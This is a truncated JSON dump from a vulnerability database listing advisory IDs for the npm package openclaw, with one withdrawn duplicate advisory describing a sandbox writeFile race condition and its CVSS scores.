mj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aj
a9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv
2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pa
e5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vq
rj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zh
py-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-wmgj-hrx3-23gj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z8sm-pm9t-wyhu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90857?format=json","vulnerability_id":"VCID-z9a2-t66z-buga","summary":"Duplicate Advisory: OpenClaw: Sandbox `writeFile` commit could race outside the validated path\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-xvx8-77m6-gwg6. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.11 contains a sandbox boundary bypass vulnerability in the fs-bridge writeFile commit step that uses an unanchored container path during the final move operation. 
An attacker can exploit a time-of-check-time-of-use race condition by modifying parent paths inside the sandbox to redirect committed files outside the validated writable path within the container mount namespace.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xvx8-77m6-gwg6","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xvx8-77m6-gwg6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32977","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32977"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sandbox-boundary-bypass-via-unanchored-writefile-commit-path","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X
/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-sandbox-boundary-bypass-via-unanchored-writefile-commit-path"},{"reference_url":"https://github.com/advisories/GHSA-xxj4-96ph-g6j6","reference_id":"GHSA-xxj4-96ph-g6j6","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xxj4-96ph-g6j6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-
d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-
y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-
ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-
2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID